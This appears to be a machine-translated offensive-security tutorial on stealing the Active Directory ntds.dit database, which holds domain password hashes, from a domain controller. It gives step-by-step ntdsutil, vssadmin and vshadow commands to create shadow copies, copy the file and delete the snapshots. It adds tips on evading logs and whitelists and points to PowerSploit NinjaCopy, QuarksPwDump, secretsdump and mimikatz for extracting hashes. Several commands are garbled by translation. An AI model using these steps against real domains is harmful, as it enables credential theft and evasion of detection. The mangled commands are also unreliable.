Ntds.dit
Ntds.dit is the main ad database, including information about domain users, groups, and group membership. It also includes password hash values for all users in the domain. To further protect the password hash values, they are encrypted using the key stored in the system registry hive.
Volume Shadow Copy
Volume shadow copy service is a service framework provided by Microsoft from Windows XP for creating consistent point in time copies (i.e. snapshots).
- For data backup
- Support Windows Server 2003 and above operating systems
- By default, the system automatically creates data backup under specific conditions, such as after patch installation. In win7 system, the backup is automatically created every other week. The time cannot be determined
- Disabling VSS will affect the normal use of the system, such as system restore and windows server backup
Obtain the domain control server ntds.dit file through volume shadow copy
Calling the volume shadow copy service will generate a log file, which is located under the system and has an event ID of 7036
Executing ntdsutil snapshot "activate instance NTDs" create quit quit will generate an additional log file with event ID 98
ntdsutil snapshot "activate instance ntds" create quit quit
Ntdsutil
Domain environment default installation
Support system:
- Server 2003
- Server 2008
- Server 2012
Utilization process
- Query snapshot of current system
- Create Snapshot
The GUID is {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}
- Mount snapshot
The snapshot is mounted as C: $snap ﹣ volumeC$\
C:\$SNAP_201908291617_VOLUMEC$\
- Copy ntds.dit1copy C: \ $snap \ volume C $\ windows \ NTDs \ ntds.dit C: \ ntds.dit
Copy ntds.dit
- Uninstall snapshot 1ntdutil snapshot "unmount {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}" quit quit quit
Uninstall snapshot
- Delete snapshot 1ntdutil snapshot "delete {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}" quit quit quit
Delete snapshot
VSSAdmin
Domain environment default installation
Support system:
- Server 2008
- Server 2012
Utilization process
- Query the snapshot 1vssadmin list shadows of the current system
Query snapshot of current system
- Create snapshot 1vssadmin create shadow / for = C: get shadow copy volume name as \ \? \ globalroot \ device \ harddiskvolumeshadowcopy2
Create Snapshot
Get shadow copy volume name as \ \? \ globalroot \ device \ harddiskvolumeshadowcopy2
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Copy ntds.dit1copy \ \? \ globalroot \ device \ harddiskvolumeshadowcopy2 \ windows \ NTDs \ ntds.dit C: \ ntds.dit
Copy ntds.dit
- Delete snapshot 1vssadmin delete shadows / for = C: / quiet
Delete snapshot
Vshadow.exe
The system does not support by default, which is available in the Microsoft Windows software development kit (SDK)
Utilization process
- Query the snapshot 1vshadow.exe - Q of the current system
Query snapshot of current system
- Create snapshot 1vshadow.exe - P - NW C: get the snapshotsetid, snapshotid, and shadow copy device name.
Create Snapshot
Get the snapshotsetid, snapshotid, and shadow copy device name.
- Copy ntds.dit1copy shadow copy device name \ windows \ NTDs \ ntds.dit C: \ ntds.dit
Copy ntds.dit
- Delete snapshot 1vshadow - DX = {snapshotsetid} or1vshadow - DS = {snapshotid}
Delete snapshot
Or
Command execution with vshadow
reference material:
https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
Execute command:
After execution, there is a process vssvc.exe in the background, and the service volume shadow copy is running. You need to manually close the process vssvc.exe
Note:
Closing process vssvc.exe manually will generate log 7034
Use ideas:
Vshadow.exe contains Microsoft signature, which can bypass some white list restrictions. If it is a startup item, the default startup list of AutoRuns is not displayed
Obtain the domain control server ntds.dit file through ninjacopy
Download address:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
The volume shadow copy service was not called, so the log file 7036 will not be generated
QuarksPwDump
Quarks pwdump is an open-source Windows user credential extraction tool, which can capture various types of user credentials under the windows platform, including: local account, domain account, cached domain account and BitLocker.
Repair the copied database
Use quarkspwdump to read information directly and export the results to a file
secretsdump.py
You can use the secretsdump.py script in the impacket suite to decrypt it. It's a bit busy. It can also be decrypted with mimikatz, but it feels like quarkspwdump is faster.